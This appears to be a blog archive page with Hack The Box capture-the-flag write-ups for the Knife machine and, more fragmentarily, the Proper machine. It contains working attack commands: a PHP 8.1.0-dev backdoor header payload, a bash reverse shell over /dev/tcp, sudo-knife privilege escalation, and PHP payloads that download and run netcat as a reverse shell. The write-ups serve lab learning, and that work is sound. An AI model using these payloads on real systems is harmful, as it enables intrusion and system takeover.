Month: May 2021
Protected: pg-flasky-private
Protected: htb-context-private
Protected: htb-ascension-private
Protected: pg-fail-private
htb-knife-private
Introduction@Knife:~$
Column | Details |
---|---|
Name | Knife |
IP | 10.10.10.242 |
Points | 20 |
Os | Linux |
Difficulty | Easy |
Creator | MrKN16H |
Out On | 22 May 2021 |
Recon
Nmap
Let’s first start with 80
port.
Port-80
There is a simple
html page.
No links are working
also.
When i go to debugger
tab i see a js file called pen.js
but nothing interesting
there.
I also run gobuster
but nothing found.
Let’s try with burp
and check the response
headers.
Got a php version "PHP/8.1.0-dev"
let’s search on google for exploit
for this specific
version.
Let’s follow the article
and check it’s working
or not.
I capture the req of port-80
and sent it to repeater
and add the user-agentt
parameter.
If this works
we got the output as int(6)
It’s works let’s execute
the commands with zerodiumsystem
.
We got the output
as james
user let’s try to get the reverse
shell.
But first start the netcat
listener on port 9001
.
Now let’s add
the bash shell command in user-agentt
.
The response
is not coming it’s means the page is reloading
let’s check the netcat
listener.
And we got the shell
and get our user.txt
file.
just curling
┌─[✗]─[puck@parrot-lt]─[~/htb/knife]
└──╼ $curl http://10.10.10.242/index.php -H "User-Agentt: zerodiumsystem(\"bash -c 'bash -i &>/dev/tcp/10.10.14.3/1234 0>&1 '\");"
┌─[puck@parrot-lt]─[~/htb]
└──╼ $nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.242] 43870
bash: cannot set terminal process group (983): Inappropriate ioctl for device
bash: no job control in this shell
james@knife:/$
Let’s get the ssh
shell before proceed to privilege-escalation
for that we need to add our ssh
public key inside james .ssh
folder.
First let’s create ssh
key with ssh-keygen
.
Now let’s add this id_rsa.pub
key inside authorized_keys
.
Now let’s try to login
through ssh .
Privilege Escalation
If we see in our home
folder there is a ruby
file called ex.rb
The ruby file just read the /etc/shadow
file but we can’t execute the file because ruby
is not installed in the system
.
Let’s try sudo -l
command.
When we run sudo -l
there is a file called knife
which we run with sudo privilege
and when we see that file inside /usr/bin/knife
we see a symlink with the file inside /opt/chef-workstation/bin/knife
.
When we go inside /opt/chef-workstation
directory then we known that it’s a ruby
installation directory
It’s mean we can execute
ruby files and commands with /usr/bin/knife
not with the ruby command that’s why we can’t execute that file ex.rb
inside james home directory.
Now we run the ruby
files let’s run that ex.rb
inside james home directory.
And we can cat the /etc/shadow
file let’s create a file for get the root
privileges.
In the ruby
file i simply give permission to /bin/bash
for suid bit set so james
user can easily execute the root
commands and get our root.txt
.
And we pwned
it …….
Quicker: Output shows that james is allowed to run knife as root. Knife tool provides an interface to manage Chef automation server nodes, cookbooks, recipes and etc. Knife usage can be read from https://manpages.ubuntu.com/manpages/bionic/man1/knife.1.html Some examples shows that, it is possible to edit knife data bags using a text editor. We can try that. sudo knife data bag create 1 2 -e vi This opens up the vim editor. We type below in the editor to get a shell as root. :!/bin/sh
.
Resources
Topic | Url |
---|---|
PHP 8.1.0-dev development version backdoor | https://blog.csdn.net/zy15667076526/article/details/116447864 |
htb-proper-nl
HTB – Proper
.
We can dump with:
┌──(kali㉿kali)-[~/htb/proper]
└─$ sqlmap -u “http://proper.htb/products-ajax.php?order=id+desc&h=a1b30d31d344a5a4e41e8496ccbdd26b” –eval=”import hashlib ; h=hashlib.md5((‘hie0shah6ooNoim’+order).encode(‘utf-8’)).hexdigest()” –batch –threads=10 –dump
.
.
then a dirb
┌──(kali㉿kali)-[~/…/output/proper.htb/dump/cleaner]
└─$ dirb http://proper.htb/
—————–
DIRB v2.22
By The Dark Raver
—————–
START_TIME: Fri May 21 02:21:54 2021
URL_BASE: http://proper.htb/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
—————–
GENERATED WORDS: 4612
—- Scanning URL: http://proper.htb/ —-
==> DIRECTORY: http://proper.htb/assets/
+ http://proper.htb/index.html (CODE:200|SIZE:14257)
==> DIRECTORY: http://proper.htb/licenses/
—- Entering directory: http://proper.htb/assets/ —-
==> DIRECTORY: http://proper.htb/assets/api/
.
whe can then login to: http://proper.htb/licenses/licenses.php
and view licenses , nothing more
.
┌──(kali㉿kali)-[~/htb/proper]
└─$ cat read2.sh
#!/bin/bash
HOST=10.10.10.231
SALT=hie0shah6ooNoim
TRAV=$1
USER=vikki.solomon@throwaway.mail
PASS=password1
#!/bin/bash
COOKIE=$(mktemp -u)
PROXY=127.0.0.1:8080
# login
curl -c $COOKIE -s -o /dev/null http://$HOST/licenses/index.php
curl -s \
-b $COOKIE \
-o /dev/null \
-d “username=${USER}&password=${PASS}” \
http://$HOST/licenses/index.php
# SMB RFI
curl -s \
-b $COOKIE \
-G \
-d “theme=${TRAV}” \
-d “h=$(echo -n ${SALT}${TRAV} | md5sum | cut -d’ ‘ -f1)” \
-o /dev/null \
-x $PROXY \
http://$HOST/licenses/licenses.php
# clean up
rm -rf $COOKIE
┌──(kali㉿kali)-[~/htb/proper]
..
.
┌──(kali㉿kali)-[~/htb/proper]
└─$ cat race.sh 130 ⨯
#!/bin/bash
PAYLOAD=$1
while :; do
echo hello world > header.inc
echo “$PAYLOAD” > header.inc
done
.
sudo python3 smbserver.py -ip 10.10.14.23 -smb2support evil .
sudo python3 smbserver.py -username web -password ‘charlotte123!’ -ip 10.10.14.23 -smb2support evil .
.
./race.sh ‘<?php system(“cmd /c powershell iwr http://10.10.14.73/nc64.exe -outf \windows\system32\spool\drivers\color\cute.exe”); ?>’
.
./race.sh ‘<?php system(“cmd /c start \windows\system32\spool\drivers\color\cute.exe 10.10.14.73 1234 -e cmd.exe”); ?>’
.